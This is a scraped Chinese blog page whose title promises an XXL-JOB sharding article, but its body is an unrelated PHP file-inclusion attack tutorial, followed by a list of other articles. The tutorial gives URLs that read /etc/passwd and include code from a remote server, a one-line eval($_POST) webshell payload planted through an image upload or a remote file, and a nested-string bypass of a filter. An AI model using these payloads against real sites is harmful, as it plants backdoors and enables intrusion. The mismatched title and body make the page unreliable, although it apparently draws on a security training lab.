2. 程式人生 > 其它 >利用 XXL-JOB 實現靈活控制的分片處理

利用 XXL-JOB 實現靈活控制的分片處理

阿新 發佈:2021-06-19

本地檔案包含(LFI)

http://ipaddress.com/index.php?page=f.php
http://ipaddress.com/index.php?page=/etc/passwd

遠端檔案包含(RFI)

http://ipaddress.com/index.php?page=http://remote_server/test.jpg

# 在test.jpg中包含以下內容
<?fputs(fopen("shell.php","w"),'<?php eval($_POST[pass]);?>')?>

檢查php.ini配置檔案

allow_url_include = On

開啟檔案包含功能,開啟後可通過include(), require(), include_once(), require_once()函式去包含某些檔案

allow_url_fopen = On

允許包含一個遠端檔案

本地檔案包含(Webshell)

  1. 製作一句話圖片木馬 test.jpg
<?fputs(fopen("shell.php","w"),'<?php eval($_POST[pass]);?>')?>

  1. 上傳圖片木馬

  2. 執行檔案包含並生成後門

  3. 通過菜刀連線Webshell

遠端檔案包含(Webshell)

建立遠端伺服器,比如在Kali中建立。

建立一個txt檔案

<?fputs(fopen("shell.php","w"),'<?php eval($_POST[pass]);?>')?>

然後做一個遠端檔案包含

通過菜刀連線就好了

低安全級別

<?php
  $file = $_GET['page']; //The page we wish to display 
?>

沒有任何防禦措施,直接包含檔案

中安全級別

<?php
  $file = $_GET['page']; // The page we wish to display 

  // Bad input validation
  $file = str_replace("http://", "", $file);
  $file = str_replace("https://", "", $file);    
?>

http://https://替換成空。可以hthttp://tp://來繞過防禦

高安全級別

<?php
  $file = $_GET['page']; //The page we wish to display 

  // Only allow include.php
  if ( $file != "include.php" ) {
    echo "ERROR: File not found!";
    exit;
   } 
?>

只允許某個特定的檔案被包含,安全,但不好用。

相關推薦

利用 XXL-JOB 實現靈活控制分片處理

本文講述了一種利用 XXL-JOB 來進行分片任務處理的方法,另外加入對執行節點數的靈活控制

jdbc利用java反射實現結果集得到處理:bug:argument type mismatch

jdbc利用java反射處理結果集時:bug:argument type mismatc ■ 背景:利用反射處理結果集過程如下[利用了javaBeans]:

Python 利用郵件系統完成遠端控制電腦的實現(關機、重啟等)

0. 我們如何通過郵件系統完成遠端控制電腦(關機、重啟等)? 實現思路: 需要有兩個郵箱:接收指令郵箱(A)傳送指令郵箱(B)

oracle利用job實現儲存過程非同步執行

1.背景 在實際開發中,我們可能會利用儲存過程批量處理業務, 對應有些儲存過程可能會執行很長時間,這時我們需要客戶端點操作後,儲存過程非同步執行

利用 JavaScript 實現併發控制的示例程式碼

一、前言   在開發過程中,有時會遇到需要控制任務併發執行數量的需求。

如何利用 JavaScript 實現併發控制

一、前言 在開發過程中,有時會遇到需要控制任務併發執行數量的需求。 例如一個爬蟲程式,可以通過限制其併發任務數量來降低請求頻率,從而避免由於請求過於頻繁被封禁問題的發生。

JavaScript實現大檔案分片上傳處理

很多時候我們在處理檔案上傳時,如視訊檔案,小則幾十M,大則 1G+,以一般的HTTP請求傳送資料的方式的話,會遇到的問題:

9-3.MVC 自定義過濾器(Filter)實現路由控制、異常處理、授權處理(獲取客戶端資訊)

https://blog.csdn.net/zy0421911/article/details/54911712?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&depth_1-

SpringBoot整合Xxl-Job實現各種任務排程(原始碼加避坑)

前言:學習一個技術最好的方式就是先學會執行一個demo,去了解一個大概後,再去深究細節;

XXL-JOB任務排程中心實現執行備註換行

XXL-JOB任務排程中心實現執行備註換行 public enum RedisKeyEnum { // SEPARATOR(1, \":\", \"分隔符\"),

XXL-JOB v2.1.1 釋出,分散式任務排程平臺

XXL-JOB 正在角逐 “2019年度最受歡迎中國開源軟體”,期待您寶貴的一票!投票連結

Spring Boot 通過AOP和自定義註解實現許可權控制

相逢便是 緣 ,路過點個 贊 ^.^ 原始碼:https://github.com/yulc-coding/java-note/tree/master/aop

一文讀懂分散式任務排程平臺XXL-JOB

本文主要介紹分散式任務排程平臺XXL-JOB(v2.1.0版本),包括功能特性、實現原理、優缺點、同類框架比較等

揪出XXL-JOB中的細節

前言 國慶節快到了,要開始休假了,筆者還是很開心的,國慶快樂! 廢話少說,直接進入正題。

分散式任務排程平臺XXL-JOB

為獲得更好的閱讀體驗,請訪問原文:傳送門 一、分散式任務排程概述 什麼是任務排程平臺

如何實現java遞迴 處理許可權管理選單樹或分類

這篇文章主要介紹瞭如何實現java遞迴 處理許可權管理選單樹或分類,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Android利用碎片fragment實現底部標題欄(Github模板開源)

fragment特點 Fragment與Activity相似,有自己的生命週期,佈局。相當於一個迷你的Activity

Spring Boot 通過AOP和自定義註解實現許可權控制的方法

本文介紹了Spring Boot 通過AOP和自定義註解實現許可權控制,分享給大家,具體如下:

如何利用C語言實現最簡單的HTTP伺服器詳解

此段程式碼的特點 <h1>Hello!</h1> 如何編譯執行? 編譯:gcc -o hello_server hello_server.c

Springboot實現高吞吐量非同步處理詳解(適用於高併發場景)

技術要點 org.springframework.web.context.request.async.DeferredResult<T> 示例如下: 1. 新建Maven專案 async